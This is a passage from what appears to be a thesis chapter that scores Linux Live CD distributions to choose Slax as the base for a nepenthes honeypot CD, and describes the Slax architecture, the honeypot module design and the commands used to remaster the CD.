designed for everyday computing but may be remastered with some effort. Official
guides and manuals facilitate these activities.
• PCLinuxOS: PCLinuxOS6 is a free Live CD for private end-users and is one of
the few distributions derived from Mandrake. Its hardware support is very good.
As Jordan (2006) states, “compared to Knoppix, MEPIS and Kanotix, there are
fewer applications” though.
Adapting the CD is comparatively easy due to a number of scripts that permit
quick modifications of the whole system.
• Slax: Slax7 is a well-known distribution (cmp. FrozenTech, 2004a) and is based
on Slackware as the name suggests. It is free of charge and is primarily used for
private purposes. Because of its small size, the distribution may be copied to a
USB flash drive. Similar to Knoppix, its hardware support is excellent.
One of Slax’s unique features is its modular design: Modules contain one or more
specific software applications and may be added or removed without affecting other
parts of the system. This makes remastering the Live CD extremely easy. In case
developers still require help, they are supported by a growing community and
several step-by-step guides.
• Ubuntu: Ubuntu8 is a free, desktop- and multimedia-oriented Debian derivative
by Mark Shuttleworth. At the time of this writing, it heads the list of the most
popular Linux distributions (see DistroWatch, 2007). Presumably, this position
may also be attributed to its outstanding usability (cmp. FrozenTech, 2005b).
Similar to SimplyMEPIS, Ubuntu may function both as a Live CD and as
an operating system copied to hard disk. Remastering activities require an in-depth knowledge of the underlying system, even though the individual segments
are extensively documented.
The main characteristics of each distribution are summarized in Table 4.1. These Live
CDs are assessed using our own selection model, which is presented in the
next section.
6 see http://www.pclinuxos.com/
7 see http://www.slax.org/
8 see http://www.ubuntu.com/
Distribution   Assessed Version   Size         Based on    Kernel Version
Knoppix        5.11               700 MB       Debian      2.6.19
Kanotix        2007-RC6           701 MB       Debian      2.6.22
SimplyMEPIS    6.5                693 MB       Ubuntu      2.6.15
PCLinuxOS      2007               299-685 MB   Mandriva    2.6.18.8
Slax           6-RC6              41-202 MB    Slackware   2.6.21.5
Ubuntu         7.10               697 MB       Debian      2.6.22
Table 4.1: Main Characteristics of Live CD Distributions
(Source: Brand, 2007; Wikipedia, 2007)
4.2 Selection Model for the Live CD Distributions
To come to a rational decision and choose an adequate candidate for our own distribution, we go through a sequential selection process as indicated in Figure 4.1: First,
we identify several influencing factors that greatly affect the development and later use
of our CD. We refer to those factors as attributes in the following. However, we do
not consider all attributes as equal. Therefore, we use weights to express their relative
importance. Finally, we apply a well-known scoring model on all distributions to make
a recommendation.
Figure 4.1: Selection Process for the Live CD Distributions
4.2.1 Overview about the Decision Attributes
Attributes “provide a means of evaluating goal accomplishments” (Yoon and Hwang,
1995, p. 8). Concerning our decision problem, we identify five different attributes, legal
restrictions and licensing, hardware compatibility, usability, ease of adaptability, and
documentation and official support, as crucial. A short description of each attribute is
presented below.
• Legal restrictions and licensing: The release version of our Live CD will be freely
distributed over the Internet for research purposes and as open source, i.e., the
entire source code will be available for future modifications by third parties (cmp.
Perens, 1998). For this reason, the base distribution must be published under the
GNU General Public License (GNU GPL, see Free Software Foundation, 2007) or
a similar licence that permits legal copying and adaptation without any charges.
• Hardware compatibility: The CD is supposed to run quickly after startup on different types of computer systems. Therefore, the base system needs to support
common hardware devices, especially network interface cards and display adapters.
Ideally, these devices are properly configured after booting without any significant
manual intervention. For example, network parameters and IP address information
are to be automatically set if the system is connected to a server with DHCP (Dynamic Host Configuration Protocol) support.
• Usability: Even though the CD is expected to be used mostly by network administrators and security professionals with a strong computer background, its
design needs to be as intuitive and as easy as possible, i.e., the honeypot should be
started in a user-friendly, graphical environment. Furthermore, common administrative tasks, e.g., changing the password of the superuser, should be carried out
quickly to permit focusing on data collection- and analysis-related activities.
• Ease of adaptability: The CD must be easily adaptable, i.e., the basis of the distribution needs to be extendable and must provide sophisticated package management
tools to permit installation, modification, and removal of software applications.
• Documentation and official support: Remastering a Live CD is a complex task
and requires a thorough understanding of the underlying operating system. Step-by-step guides, collaborative platforms such as forums, and officially supported
manuals can strongly facilitate this process and are therefore regarded as a plus.
As we have already mentioned, these attributes are not equally important to us. For
this reason, we apply a basic weighting technique that is outlined in the next section.
4.2.2 Calculation of the Decision Weights
With the help of weights, we are able to indicate the relative importance and prioritization of the individual attributes in a quantitative way. According to Yoon and Hwang
(1995, p. 11), one possibility to assess those weights is “to arrange the attributes in a
simple rank order, listing the most important attribute first and the least important attribute last”. Then, for n attributes, we simply apply the following formula to calculate
the weight wj for the jth attribute and rank rj (see Stillwell et al., 1981):
\[
w_j = \frac{n - r_j + 1}{\sum_{k=1}^{n} (n - r_k + 1)} \tag{4.1}
\]
With regard to our evaluation, we assign the following ranks to the different attributes:
Legal restrictions and licence fees have the greatest impact on the development and future distribution of our CD. For this reason, we rank this attribute as most important.
Depending on the ease of adaptability as well as the amount of documentation and official support, remastering the base system can be significantly facilitated or made more
difficult. Thus, these attributes are ranked second and third. Finally, hardware compatibility and usability are considered least important, because they have minor effects
on the development process. A summary of the attribute ranks and their corresponding
calculated weights is given in Table 4.2.
Attribute                            Attribute Rank   Attribute Weight
Legal restrictions and licensing     1                0.33
Hardware compatibility               4                0.13
Usability                            5                0.07
Ease of adaptability                 2                0.27
Documentation and official support   3                0.2
Table 4.2: Attribute Ranks and Weights for the Candidate CDs
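The weights in Table 4.2 follow directly from Formula 4.1. As a minimal illustration, the following Python sketch recomputes them from the attribute ranks. The function name and the dictionary keys are hypothetical and chosen for this example only.

```python
from fractions import Fraction


def rank_sum_weights(ranks):
    """Compute rank-sum weights (Formula 4.1) for a mapping attribute -> rank."""
    n = len(ranks)
    # Denominator of Formula 4.1: sum over all attributes of (n - r_k + 1).
    total = sum(n - r + 1 for r in ranks.values())
    return {name: Fraction(n - r + 1, total) for name, r in ranks.items()}


# Ranks as assigned in Table 4.2 (1 = most important).
ranks = {
    "legal": 1,
    "hardware": 4,
    "usability": 5,
    "adaptability": 2,
    "documentation": 3,
}

weights = rank_sum_weights(ranks)
for name, weight in weights.items():
    print(f"{name:15s} {float(weight):.2f}")
```

Exact fractions are used so that the weights sum to exactly 1; rounding is applied only when the values are printed.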
4.2.3 Overview about the Scoring Model
Considering our six candidate CDs and the different evaluation criteria, we have a
classic Multiple Attribute Decision Making (MADM) problem, i.e., we need to make a
preference decision over a number of given alternatives that are characterized by multiple
attributes (cmp. Yoon and Hwang, 1995). Several approaches are recommended in the
literature to solve such a problem (see also Yoon and Hwang, 1981): For instance, the
Simple Additive Weighting (SAW) technique is a well-known scoring model which is both
robust and easy to apply (cmp. Rowe and Pierce, 1982). With the SAW technique, we
can compute a weighted sum for each Live CD, favoring the alternative with the highest
result.
Figure 4.2: Example of an Ordinal Rating Scale
Mathematically, the weighted sum for an alternative Ai can be expressed as a value
function V (Ai ) as shown in Formula 4.2, where rij is the jth attribute value of the ith
alternative, and wj refers to the corresponding attribute weight.
\[
V(A_i) = \sum_{j=1}^{n} w_j \, r_{ij}, \qquad i = 1, \ldots, m \tag{4.2}
\]
Attribute values are derived from a five-point ordinal scale that measures the relative
performance of an alternative in comparison to other candidates for a given attribute. A
value of 1 indicates very poor relative performance, while a value of 5 reflects
very good relative performance. If an alternative is comparable to the others, we assign a
neutral value of 3. This process is illustrated in Figure 4.2.
We can now calculate the attribute values for all alternatives and apply the SAW
scoring model in order to choose an adequate candidate for our own Live CD. These
operations are subject of the next section.
4.2.4 Selection of an Adequate Candidate CD
We use the ordinal five-point scale as outlined in the previous section to assign attribute
values to the different alternatives. The ratings are based upon our own evaluation and
surveys by FrozenTech (2004b,a, 2005a,b). The final results are shown in Table 4.3.
Concerning the attribute legal restrictions and licensing, all alternatives are assigned
the neutral value 3, because they are freely available over the Internet, except for SimplyMEPIS, which is distributed under a commercial licence. This Live CD is therefore
rated lower than all other candidates. Kanotix has superior hardware compatibility and is therefore assigned the highest attribute value. Knoppix, Slax, and
PCLinuxOS have slightly better hardware support than SimplyMEPIS and
Ubuntu. The usability of most candidate distributions is outstanding; only PCLinuxOS
performs below average because of its limited number of applications. Slax is easiest
to adapt due to its modular design, closely followed by PCLinuxOS. SimplyMEPIS and
Ubuntu are relatively difficult to remaster since they require a more thorough understanding of the base system. Finally, Knoppix is leading regarding documentation and
official support. Many guides, manuals, and collaborative platforms facilitate modifications of the CD, similar to PCLinuxOS and Ubuntu. In contrast, Kanotix is extremely
badly documented and, hence, is assigned an attribute value of 1.
Distribution  Legal Restrictions and Licensing  Hardware Compatibility  Usability  Ease of Adaptability  Documentation and Official Support
Knoppix       3                                 4                       4          3                     5
Kanotix       3                                 5                       4          3                     1
SimplyMEPIS   1                                 3                       3          2                     3
PCLinuxOS     3                                 4                       2          4                     4
Slax          3                                 4                       4          5                     3
Ubuntu        3                                 3                       5          2                     4
Table 4.3: Attribute Values for the Candidate CDs
As we have already explained, these attribute values are multiplied with the corresponding attribute weights to compute the weighted sum for each alternative in accordance with Formula 4.2. As can be seen in Table 4.4, Slax is considered to be the best
choice for our own Live CD with a weighted sum of 3.7. Knoppix and PCLinuxOS are good
alternative candidates as well. The results are not very surprising, as these distributions are well-engineered, while being easy to use and adapt at the same time. Kanotix
is rated slightly below average due to its lack of official documentation. In comparison
to the leading Live CDs, Ubuntu does not have any significant advantages, except for its
usability. SimplyMEPIS is, on the whole, regarded as a rather unsatisfactory solution,
mainly because of its commercial licence.
To test the robustness of our decision, we perform a sensitivity analysis, i.e., we change
the significance of different attributes, repeat the computation step, and compare the
newly generated weighted sums with the original values. Specifically, we now consider
the attribute ease of adaptability as the most important decision criterion, followed by
hardware compatibility, and legal restrictions and licensing. Documentation and official
support and usability are ranked 4th and 5th. The results of the sensitivity analysis are
listed in Table 4.5. As can be seen, Slax is still the leading alternative, while PCLinuxOS
is now preferred over Knoppix. Kanotix performs slightly better than Ubuntu. SimplyMEPIS
remains in last place.
Distribution  Legal Restrictions and Licensing  Hardware Compatibility  Usability  Ease of Adaptability  Documentation and Official Support  Weighted Sum
Knoppix       1.00                              0.53                    0.27       0.80                  1.00                                3.6
Kanotix       1.00                              0.67                    0.27       0.80                  0.20                                2.9
SimplyMEPIS   0.33                              0.40                    0.20       0.53                  0.60                                2.1
PCLinuxOS     1.00                              0.53                    0.13       1.07                  0.80                                3.5
Slax          1.00                              0.53                    0.27       1.33                  0.60                                3.7
Ubuntu        1.00                              0.40                    0.33       0.53                  0.80                                3.1
Table 4.4: Attribute Ratings and Weighted Sums for the Live CDs
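The weighted sums of Table 4.4 can be reproduced with the SAW model of Formula 4.2. The following Python sketch is only an illustration under the assumption that the attribute values of Table 4.3 and the ranks of Table 4.2 are used as input. All identifiers are hypothetical.

```python
from fractions import Fraction

# Attribute order used for every rating tuple below.
ATTRIBUTES = ("legal", "hardware", "usability", "adaptability", "documentation")

# Attribute ranks from Table 4.2 (1 = most important).
RANKS = {"legal": 1, "hardware": 4, "usability": 5,
         "adaptability": 2, "documentation": 3}

# Attribute values from Table 4.3 (five-point ordinal scale).
RATINGS = {
    "Knoppix":     (3, 4, 4, 3, 5),
    "Kanotix":     (3, 5, 4, 3, 1),
    "SimplyMEPIS": (1, 3, 3, 2, 3),
    "PCLinuxOS":   (3, 4, 2, 4, 4),
    "Slax":        (3, 4, 4, 5, 3),
    "Ubuntu":      (3, 3, 5, 2, 4),
}


def rank_sum_weights(ranks):
    """Rank-sum weights according to Formula 4.1."""
    n = len(ranks)
    total = sum(n - r + 1 for r in ranks.values())
    return {name: Fraction(n - r + 1, total) for name, r in ranks.items()}


def saw_scores(ratings, weights):
    """Weighted sum V(A_i) for every alternative according to Formula 4.2."""
    return {
        alternative: sum(weights[attr] * value
                         for attr, value in zip(ATTRIBUTES, values))
        for alternative, values in ratings.items()
    }


scores = saw_scores(RATINGS, rank_sum_weights(RANKS))
best = max(scores, key=scores.get)
for alternative, score in scores.items():
    print(f"{alternative:12s} {float(score):.1f}")
print("Preferred alternative:", best)
```

Because the computation uses exact fractions, small differences to a manual addition of the rounded cell values in Table 4.4 are to be expected.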
Distribution  Legal Restrictions and Licensing  Hardware Compatibility  Usability  Ease of Adaptability  Documentation and Official Support  Weighted Sum
Knoppix       0.60                              1.07                    0.27       1.00                  0.67                                3.6
Kanotix       0.60                              1.33                    0.27       1.00                  0.13                                3.3
SimplyMEPIS   0.20                              0.80                    0.20       0.67                  0.40                                2.3
PCLinuxOS     0.60                              1.07                    0.13       1.33                  0.53                                3.7
Slax          0.60                              1.07                    0.27       1.67                  0.40                                4.0
Ubuntu        0.60                              0.80                    0.33       0.67                  0.53                                2.9
Table 4.5: Weighted Sums for the Live CDs after the Sensitivity Analysis
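The sensitivity analysis amounts to repeating the SAW computation with a different attribute order and comparing the resulting rankings. A minimal Python sketch of this comparison is given below. It assumes the attribute values of Table 4.3, and the helper names are hypothetical.

```python
from fractions import Fraction

ATTRIBUTES = ("legal", "hardware", "usability", "adaptability", "documentation")

# Attribute values from Table 4.3, in the order given by ATTRIBUTES.
RATINGS = {
    "Knoppix":     (3, 4, 4, 3, 5),
    "Kanotix":     (3, 5, 4, 3, 1),
    "SimplyMEPIS": (1, 3, 3, 2, 3),
    "PCLinuxOS":   (3, 4, 2, 4, 4),
    "Slax":        (3, 4, 4, 5, 3),
    "Ubuntu":      (3, 3, 5, 2, 4),
}

# Attributes listed from most to least important.
ORIGINAL = ("legal", "adaptability", "documentation", "hardware", "usability")
ALTERED = ("adaptability", "hardware", "legal", "documentation", "usability")


def weights_from_order(order):
    """Rank-sum weights (Formula 4.1) for attributes sorted by importance."""
    n = len(order)
    total = n * (n + 1) // 2
    # Position 0 corresponds to rank 1, hence the numerator n - position.
    return {name: Fraction(n - position, total)
            for position, name in enumerate(order)}


def ranking(order):
    """Return the alternatives sorted by weighted sum, and the sums themselves."""
    weights = weights_from_order(order)
    scores = {
        alternative: sum(weights[attr] * value
                         for attr, value in zip(ATTRIBUTES, values))
        for alternative, values in RATINGS.items()
    }
    return sorted(scores, key=scores.get, reverse=True), scores


base_order, base_scores = ranking(ORIGINAL)
new_order, new_scores = ranking(ALTERED)
for alternative in RATINGS:
    print(f"{alternative:12s} {float(base_scores[alternative]):.1f}"
          f" -> {float(new_scores[alternative]):.1f}")
print("Original ranking:", base_order)
print("Altered ranking: ", new_order)
```

Only one alternative attribute order is examined here, as in the text. A more thorough analysis could iterate over all permutations of the attributes.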
4.2.5 Summary of the Methodology
To select an adequate distribution as a basis for our own Live CD, we have assessed
six potential candidates against a list of multiple attributes, namely legal restrictions and
licensing, hardware compatibility, usability, ease of adaptability, and documentation and
official support. Since not all attributes were equally important to us, we have applied
weights to indicate their relative significance. These weights were used as input parameters to the Simple Additive Weighting model. The model computes a total evaluation
score for each alternative, the so-called weighted sum. Under consideration of the given
attributes, the alternative with the highest weighted sum is favored, in our case, the
Slackware-based distribution Slax. We were able to verify this result by performing a
sensitivity analysis. However, it needs to be emphasized that parts of our assessment
still remain subjective, e.g., when assigning weights or attribute values. Thus, other
distributions may well be used to create a Live CD-based honeypot, too. For example, the CD developed by the SurfIDS project (see Chapter 2) is built upon Knoppix.
Hence, our choice is eventually also a matter of personal preference.
The following explanations refer to the modification and customization of the Slax
Live CD.
4.3 Development and Remastering Process of the Live CD
As we have outlined in the previous section, we use Slax as a foundation for our own
Live CD-based honeypot. However, a good understanding of the base architecture is
required in order to successfully remaster the CD and adapt it to our needs. For this
reason, we give a brief overview of the technical implementation of the distribution
before explaining the development process in detail.
4.3.1 Technical Architecture of Slax
4.3.1.1 Boot Sequence
Similar to other Live CDs, Slax is compliant with the so-called El Torito standard, a
format specification that describes how to make a CD bootable (see Stevens and Merkin,
1995). Thus, when the computer is powered on, the system BIOS is able to invoke a
boot loader on the CD. The boot loader presents a list of valid boot images to the user
and determines the parameters and additional options the operating system is started
with. When such an image is launched, control is passed to the Linux kernel, and an
initial RAM disk is mounted into memory. This disk serves as a root file system and
contains a small number of applications which are needed for further initialization tasks.
Most importantly, the special script linuxrc gets executed. Linuxrc is responsible for
loading essential hardware drivers and creating a temporary live file system to permit
later access to programs and files. Finally, the first process of the operating system,
init, is run, which serves as a parent for all other services and daemons. Depending on
the run level, init makes different sets of programs and applications available, by default,
a graphical desktop manager with multiuser support.
Figure 4.3: Boot Sequence of the Slax Live CD
A summary illustration of the boot sequence is given in Figure 4.3. We will have a
closer look at the individual phases in a later section (see also Negus, 2007; Jones, 2006a).
First of all, however, we describe the file storage and file maintenance mechanisms used
by the distribution.
4.3.1.2 File Systems
Slax relies on two special file systems in order to store and manage files efficiently.
• SquashFS: The SquashFS9 file system is used to compress files and entire directory structures. Thereby, it is possible to keep the size of the distribution moderately small while providing a decent number of applications. By applying a
high-performance compression algorithm such as the Lempel-Ziv-Markov chain algorithm (LZMA), the
compression ratio can be increased even further (see also Lougher and Okajima, 2008).
However, one major disadvantage of SquashFS is that it is solely capable of storing
data in read-only mode. Therefore, operations which require write permissions
must be executed on a second, complementary file system.
9 see http://squashfs.sourceforge.net/
• Aufs: Due to the limitations of SquashFS and the physical characteristics of CD-ROMs, content is only accessible in read-only mode. During a user session, however,
system settings need to be frequently altered and updated. To circumvent
these restrictions, files must be temporarily shifted into writable sections of volatile
memory. In theory, several options exist to realize this operation. For
instance, it is possible to copy the entire root directory tree into RAM
in order to make the full disk available. However, this approach is not satisfactory,
because large amounts of memory are consumed.
Another option is to restrict modifications to certain parts of the system, for
example, the home directory of a user. This solution is not convincing either
because it makes reconfigurations and new installations significantly more difficult.
To overcome the said obstacles, Live CDs frequently implement so-called union
file systems. These types of file systems are able to merge read-only systems
such as SquashFS with a special directory in memory which possesses full access
permissions (cmp. Wright et al., 2004). The result of those joined directories is
called a union.
When a file needs to be changed, it is transparently transferred from the read-only
section to the writable branch of the union. This process is known as a copyup.
Thereby, while the file may be temporarily modified in memory, its original physical
instance is never touched. Consequently, the union acts as a virtual overlay for
the underlying disk structure of the CD (cmp. Figure 4.4).
Several software applications support the creation of union file systems. Slax uses
aufs (Another Union File System)10 which is maintained by Junjiro Okajima. It has
considerable advantages concerning the performance and stability over Unionfs, a
comparable solution which is more popular11.
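The copy-up mechanism described above can be illustrated with a small conceptual model. The following Python sketch is not how aufs is implemented. It merely mimics the observable behavior of a union with one read-only and one writable branch, and the class and method names are hypothetical. Deleting files, which union file systems typically handle with special marker entries, is not modeled.

```python
class UnionSketch:
    """Toy model of a union: a read-only lower branch plus a writable upper branch."""

    def __init__(self, read_only_files):
        # Stands in for the compressed, read-only content of the CD.
        self._lower = dict(read_only_files)
        # Stands in for the writable directory in volatile memory.
        self._upper = {}

    def read(self, path):
        # The writable branch takes precedence over the read-only branch.
        if path in self._upper:
            return self._upper[path]
        return self._lower[path]

    def append(self, path, data):
        if path not in self._upper:
            # Copy-up: duplicate the original into the writable branch first.
            self._upper[path] = self._lower.get(path, b"")
        self._upper[path] += data

    def reboot(self):
        # All changes live in memory only and are lost on shutdown or reboot.
        self._upper.clear()


fs = UnionSketch({"/etc/motd": b"Welcome\n"})
fs.append("/etc/motd", b"modified by user\n")
print(fs.read("/etc/motd"))   # merged view contains the modification
fs.reboot()
print(fs.read("/etc/motd"))   # original content is visible again
```

The model also shows why a Live CD-based decoy can be put back online quickly after a compromise: discarding the writable branch restores the original state.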
10 see http://aufs.sourceforge.net/
11 see http://www.am-utils.org/project-unionfs.html and the discussion on the mailing list of the Stony Brook University, http://www.fsl.cs.sunysb.edu/
Figure 4.4: Illustration of the Union File System
4.3.1.3 File System Modules
In order to store programs and other software components on the CD, Slax uses a
number of file system modules. Each module saves a specific directory tree in compressed
format. When the system boots up, the modules are uncompressed and mounted into
a temporary union to create a global unified file system. As we have described in the
previous section, this operation is completely transparent to the end user.
A major advantage of the modular-oriented approach is that remastering the operating system is much more comfortable compared to other distributions. For instance,
to remove a set of applications with a certain behavior, it is sufficient to delete the
corresponding module. This process does not affect the functionality of other software
artifacts. In turn, Slax can be easily extended by developing new modules which are
automatically integrated by the system at startup. In fact, a huge collection of different
modules for various purposes is already available for download12.
12 see http://www.slax.org/modules.php
By default, Slax defines nine base modules with numerous software packages. A software package provides a pre-configured, fully working application. A description of all
software packages can be found on the accompanying CD-ROM of this thesis; a short
overview of the base modules is given in Table 4.6.
As we have already indicated, the concepts outlined above need to be thoroughly
understood before starting to adapt the distribution. Furthermore, because changes may
greatly affect system stability and performance, we recommend planning and documenting
all modifications in advance. The project specifications for our Live CD are presented
in the following. The description of the remastering process is subject of Section 4.3.3.
Module        Description
001-core      Base system with essential hardware drivers, libraries, and
              console applications for administrative purposes
002-apps      Extends the core module and provides a collection of popular
              services and applications, e.g., the Common Unix Printing
              System (CUPS), the GNU Awk (GAWK) text processor, and
              the OpenSSL libraries to support cryptographic functions
003-network   Collection of network-related daemons and applications, for
              example, the bind DNS server, a basic Internet browser, multiple
              network monitoring tools, and utilities for remote connection
004-xorg      Libraries for the graphical desktop environment
005-xapdeps   Extends the xorg module and stores additional libraries for
              the graphical desktop environment
006-kde       Provides the K Desktop Environment (KDE), a graphical user
              interface, and basic multimedia applications
007-kdeapps   Extends the KDE session manager with various multimedia
              applications such as K3b, a CD recording utility
008-office    Basic office and text processing applications
009-devel     Stores multiple applications for software development, including
              the GNU Compiler Collection (GCC) and the Linux kernel headers
Table 4.6: Base Modules Included in the Slax Live CD
4.3.2 Project Specifications for the Live CD
The central component of our Live CD is formed by a pre-configured honeypot. More
precisely, we favor a low-interaction variant, mainly because of two reasons: First, a
low-interaction honeypot imposes a comparatively smaller level of complexity on the
system administrator. Thus, it can be quickly set up and is easy to maintain as we
have explained in Chapter 2. Second, one of the primary objectives of this project is
50
to support the deployment of honeynets with numerous electronic baits within a short
amount of time in order to collect data about malicious activities on a large scale. For
a standardized high-interaction environment, attackers would likely be able to develop
fingerprints of the systems sooner or later and circumvent the decoys in the future (cmp.
Honeynet Project, 2004b). This would render the CD ineffective. That is why high-interaction
honeypots are not applicable in our case.
To integrate the honeypot with our Live CD, we develop a separate file system module which is automatically loaded when the operating system is started. The module
contains the core honeypot files, its system dependencies, and various scripts for configuration and administrative purposes.
Concerning the low-interaction honeypot, we choose to implement nepenthes, which we
have already introduced in a previous chapter of this thesis. Nepenthes runs stably and
can be set up without problems. Additionally, its hardware requirements are moderate.
It consumes only small amounts of memory and is highly scalable (cmp. Bächer et al.,
2006). These characteristics make nepenthes well-suited for our needs.
To guarantee the integrity and safety of the CD, we execute the honeypot within a
secured environment, a so-called jail, which is difficult to break out of. Even if
adversaries succeed in compromising the decoy, their access is restricted to certain files
and directories, and they cannot modify substantial parts of the disk.
Another challenge that we must cope with is the volatile environment of the Live CD:
When the system crashes or is accidentally rebooted, all results of our research are lost,
because data is solely stored in memory. We can solve this problem by sending captured
malware as well as information about threats and intrusions to a central server on the Internet. The server is responsible for creating backups of our files and generating reports
about the behavior of the malicious software coming in. Thereby, security professionals
ideally need to analyze the status of only this machine on a regular basis. In contrast, once started, the Live CD-based honeypot is supposed to collect incident-related
data without further, significant manual intervention. However, in case administrators
have to reconfigure certain parts of the system, they should be able to log in locally or
remotely over an encrypted network connection at any time.
The core functionality of the Live CD as well as the co-operation with the central
server is shown in Figure 4.5. The implementation of the individual software parts is
illustrated in the next section.
Figure 4.5: Functionality of the Live CD-Based Honeypot
4.3.3 Illustration of the Remastering Process of the Live CD
4.3.3.1 Preparing the System Environment
In order to develop our own Live CD, we must make substantial modifications to the
base modules that are provided with Slax (cmp. Table 4.6). For this reason, we need
to copy the compressed modules to a persistent hard disk partition, uncompress the
necessary files, make appropriate changes, and finally burn the new derivative of the
distribution to CD.
To create the persistent system environment, we use a so-called partition editor like
fdisk or cfdisk. The partition editor helps divide a hard disk into smaller, more manageable sections of space (see Dalheimer and Welsh, 2005)[13]. With regard to our project
specifications, we add a partition with a size of 1.5 GB: About 800 MB have to be
reserved for the decompressed modules, another 250 MB for the final image of our CD.
The remaining space may be used for file manipulation operations.
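The space budget can be checked with a few lines of shell arithmetic. This is only an illustrative sketch: it assumes that 1.5 GB is counted as 1536 MB, and the variable and function names are hypothetical.

```shell
#!/bin/sh
# Space budget for the work partition, in MB.
# Assumption: 1.5 GB is counted as 1536 MB (binary units).
PARTITION_MB=1536
MODULES_MB=800      # decompressed base modules
IMAGE_MB=250        # final image of the CD

# remaining_mb: print the space left for file manipulation operations.
remaining_mb() {
    echo $(( PARTITION_MB - MODULES_MB - IMAGE_MB ))
}
```

Under these assumptions, slightly less than 500 MB remain as working space.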
In order to store files on the new partition, we need to build a valid Linux file
system with the help of the mkfs command and mount it into the directory hierarchy
of the operating system. Afterwards, we can recursively copy the CD to hard disk and
extract the base modules using the lzm2dir utility which is part of the Slax Live CD.
This process is illustrated in Lines 1 to 18 of Listing 4.1.
When all changes are completed, we compile an updated version of the module in
question, compress it with the dir2lzm application (see Line 21) which is also provided
by Slax, and finally overwrite the original instance of the CD. In the last step, we run
the make_iso.sh script to generate a new, bootable image of the distribution that can
be burned to CD as we have already indicated.
The individual actions which are required to remaster the main parts of the Live CD
are summarized in Figure 4.6. As we will see in the following section, we go through a
similar process to build our own honeypot module.
Figure 4.6: Overview about the Remastering Process
[13] Note: This reference applies to all system commands and applications that are described in this section unless otherwise stated.
 1  # create the file system for the partition hda2
 2  mkfs -t ext3 /dev/hda2
 3
 4  # create a mount point for the partition
 5  mkdir /mnt/hda2
 6  mount -rw /dev/hda2 /mnt/hda2
 7
 8  # recursively copy the CD to hard disk
 9  cp -rdpv /mnt/live/mnt/hdc /mnt/hda2/CD
10
11  # create a source directory for the modules
12  mkdir /mnt/hda2/sources
13  cd /mnt/hda2/sources; mkdir 001-core; ...; mkdir 009-devel
14
15  # decompress the base modules of the CD
16  lzm2dir /mnt/hda2/CD/slax/base/001-core.lzm 001-core/
17  ...
18  lzm2dir /mnt/hda2/CD/slax/base/009-devel.lzm 009-devel/
19
20  # after all changes have been made, compress the new module and
21  # overwrite the original module with the updated version
22  dir2lzm 001-core/ 001-core.lzm
23  ...
24  dir2lzm 009-devel/ 009-devel.lzm
25
26  cp *.lzm /mnt/hda2/CD/slax/base
27
28  # create an image of the new Live CD
29  /mnt/hda2/CD/slax/make_iso.sh
Listing 4.1: Preparation of the System Environment
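The steps that Listing 4.1 abbreviates with "..." can be written as a loop over the module names of Table 4.6. The following is a minimal sketch and not part of the original listing: the run helper and the DRY_RUN variable are hypothetical additions that allow the commands to be printed instead of executed, and the modules are compressed directly into the base directory of the CD copy instead of being copied there afterwards.

```shell
#!/bin/sh
# Base modules of the Slax Live CD (names taken from Table 4.6).
MODULES="001-core 002-apps 003-network 004-xorg 005-xapdeps 006-kde 007-kdeapps 008-office 009-devel"

# Paths as used in Listing 4.1.
CD_BASE=/mnt/hda2/CD/slax/base
SRC_DIR=/mnt/hda2/sources

# run: print the command when DRY_RUN is set, execute it otherwise.
# (Hypothetical helper, not part of Slax.)
run() {
    if [ -n "${DRY_RUN:-}" ]; then
        echo "$*"
    else
        "$@"
    fi
}

# Decompress every base module into its own source directory.
extract_modules() {
    for m in $MODULES; do
        run mkdir -p "$SRC_DIR/$m"
        run lzm2dir "$CD_BASE/$m.lzm" "$SRC_DIR/$m/"
    done
}

# Recompress every module and overwrite the original on the CD copy.
rebuild_modules() {
    for m in $MODULES; do
        run dir2lzm "$SRC_DIR/$m/" "$CD_BASE/$m.lzm"
    done
}
```

Setting DRY_RUN=1 before calling extract_modules or rebuild_modules only prints the commands, which is a convenient way to review them before any file on the partition is touched.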
4.3.3.2 Developing the Honeypot Module
Our honeypot module is composed of three interdependent elements, namely the nepenthes low-interaction honeypot as the core component, the secured system environment, and a couple of scripts that are required for maintaining and configuring the
decoy.
Building the core honeypot files: By default, nepenthes consists of a significant number of vulnerability, shellcode parsing, fetch, submission, and logging modules. The
interaction among these modules has already been described in Chapter 2; a thorough
explanation can also be found in the paper by Bächer et al. (2006). However, it is
important to stress that many of the standard vulnerability modules in particular are
quite outdated. For example, the vuln-asn1 module emulates a buffer overrun flaw in
a Microsoft Windows system library which was published in 2004 (see Microsoft Corporation, 2004b). For this reason, it is questionable whether these types of vulnerabilities
are still capable of attracting common malware of today (cmp. Holz, 2008). That is why
we supplement nepenthes with several additional modules that are developed and maintained at the University of Mannheim. They are able to simulate more recent security
weaknesses and, thus, are likely to be targeted by newer and more modern variants of
malicious software. An overview of the custom modules is given in Table 4.7.
Type of Module          Name of Module          Description
Logging Modules         log-download-privacy    Logs download and submit events and supports the anonymization of local IP addresses.
                        log-geoip               Queries a geographical database to find location-related information about an attacker.
                        log-surfnet-privacy     Sends submission-related events to a central server. Local IP addresses are sanitized for privacy purposes.
Other Modules           module-mirror           Mirrors incoming malicious traffic to simulate a vulnerable system.
                        module-proxy            Acts as a proxy server for incoming malicious traffic.
Vulnerability Modules   vuln-apache2058         Emulates an off-by-one remote buffer overflow vulnerability for the Apache ModRewrite module.
                        vuln-arcserve           Emulates a buffer overflow vulnerability for the CA BrightStor ARCserve Backup.
                        vuln-arcservesql        Emulates a remote buffer overflow vulnerability for the CA BrightStor ARCserve Backup Agent for SQL.
                        vuln-axigen2b           Emulates a remote format string vulnerability for the Axigen eMail Server 2.0.0b2.
                        vuln-brightstor11520    Emulates a remote injection vulnerability for the CA BrightStor Backup 11.5.2.0 application.
                        vuln-chimaeraftp        [...] vulnerability for the WFTPD and FreeFTPD FTP server.
                        vuln-com3tftp           [...] vulnerability for the 3Com TFTP server.
                        vuln-imail2006          Emulates a remote buffer overflow vulnerability for the IpSwitch IMail 2006 and IMail 8.x mail server.
                        vuln-mailenable1x       [...] vulnerability for the MailEnable Enterprise 1.04 and MailEnable Professional 1.54 mail server.
                        vuln-mailenable234      [...] vulnerability for the MailEnable Enterprise 2.34 mail server.
                        vuln-ms06040            [...] vulnerability for the Server service of Microsoft Windows.
                        vuln-ms06070            [...] vulnerability for the Workstation service of Microsoft Windows.
                        vuln-wftpd323           [...] vulnerability for the WFTPD 3.23 FTP server.
Table 4.7: Custom-Built Modules of the nepenthes Low-Interaction Honeypot
To build the different elements of the honeypot, we have to use various helper tools that
are part of the GNU Configure and Build System (see Vaughan et al., 2000): The GNU
autoconf[14] utility creates a configuration script from a template file for a given source
